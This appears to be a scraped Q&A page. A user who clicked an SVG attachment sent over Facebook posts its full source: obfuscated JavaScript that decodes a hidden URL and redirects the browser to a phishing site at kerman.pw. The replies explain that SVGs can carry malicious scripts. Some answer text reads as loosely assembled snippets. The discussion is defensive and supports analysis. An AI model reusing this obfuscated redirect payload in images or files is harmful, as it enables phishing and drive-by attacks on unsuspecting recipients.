I recieved facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then new tab with red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (http://kerman.pw/?fb_dsa
).
Then I downloaded the .svg file using the "Save link as..." function. It seems it is some javascript code embeeded into svg, so I am posting it here (I do not know JS very well):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function xcxxy(gyqbv,hzrgh,ktjrf){
var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
var bnkdip = "";
var igrqm = 0;
while(vyqsvo[igrqm]){
igrqm++;
}
var kwwtmh = 0;
while(gyqbv[kwwtmh]){
var jikaig = 0;
var axfnq = -1;
while(qixua[jikaig]){
if(qixua[jikaig] == gyqbv[kwwtmh]){
axfnq = jikaig;
break;
}
jikaig++;
}
if(axfnq >= 0){
var abxnk = 0;
var wjtfca = -1;
while(vyqsvo[kwwtmh%igrqm][abxnk]){
if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
wjtfca = abxnk;
break;
}
abxnk++;
}
bnkdip += qixua[wjtfca];
}else{
bnkdip += gyqbv[kwwtmh];
}
kwwtmh++;
}
var evhrt = "";
for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
evhrt += bnkdip[izqfrv];
}
bnkdip = evhrt;
return bnkdip;
}
var obejok = window;
var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
var leizjp = xcxxy("kBB?5S:Uh",1,false);
var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
]]></script>
</svg>
I don't really know javascript, and I wanted to ask what it can do. Could it hurt me? Thank you very much
Yes, you heard that right, JavaScript and this is exactly how bad guys exploit this file format. By injecting malicious JavaScript code into the file, they can redirect the browser to a malicious website. The image below shows the inspection of the SVG file and the malicious JavaScript embedded in it.
JavaScript can be added anywhere in an SVG document between the opening and closing <svg> tags. In general, a script should be placed at the end of the document to avoid blocking and allow the script complete access to the DOM.
What is an SVG file? Scalable Vector Graphics (SVG) is a web-friendly vector file format. As opposed to pixel-based raster files like JPEGs, vector files store images via mathematical formulas based on points and lines on a grid.
You are correct that the SVG file has embedded javascript. SVG's are Vector graphic files which will draw a image in the browser based on the instructions inside the file. The SVG you found contains obfuscated javascript to hide what is actually going on.
At a glance from what I can see, it is a script to open a new browser window and load a new URL, so by itself, it is not dangerous, it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.
So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.
I hope that helps.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With